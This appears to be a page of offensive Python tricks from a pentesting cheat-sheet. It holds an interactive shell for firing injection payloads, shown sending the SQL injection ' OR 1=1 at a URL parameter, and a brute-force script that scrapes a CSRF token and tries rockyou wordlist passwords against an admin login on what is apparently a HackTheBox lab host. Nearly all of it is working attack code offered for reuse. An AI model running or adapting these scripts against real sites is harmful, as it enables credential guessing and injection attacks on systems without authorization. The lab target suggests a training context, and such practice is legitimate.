# Python

Some tricks with python.

## cmd

Spawn interactive python shell. It can be useful if you want to test many payloads.

### Script

```python
#!/usr/bin/env python3
import cmd
from requests import get


class Send(cmd.Cmd):
	prompt = ">> "

	def do_send(self, payload):
		req = get("http://example.com?id=" + payload)
		
		print("Payload :", payload)
		print("Request :")
		print(req.text)


if __name__ == '__main__':
	Send().cmdloop()
```

### Execution

```html
>> send ' OR 1=1
Payload : ' OR 1=1
Request :
<!doctype html>
<html>

...

</html>
```

## Bruteforce (with CSRF)

### Script

```python
#!/usr/bin/env python3
import requests
from json import loads

def login(password):
	url = "http://helpdesk.delivery.htb/scp/login.php"

	sess = requests.Session()
	csrf_token = sess.get(url).text.split('<input type="hidden" name="__CSRFToken__" value="')[1].split('" />')[0]

	data = {
		"__CSRFToken__": csrf_token,
		"do": "scplogin",
		"userid": "admin@delivery.htb",
		"passwd": password,
		"ajax": "1"
	}

	req_json = loads(sess.post(url, data=data).text)

	if req_json["message"] == "Access denied":
		print("Try", password)
	else:
		print("Found", password)
		exit()

with open("/opt/rockyou.txt", "r", encoding="ISO-8859-1") as wordlist:
	for line in wordlist:
		login(line.strip())
```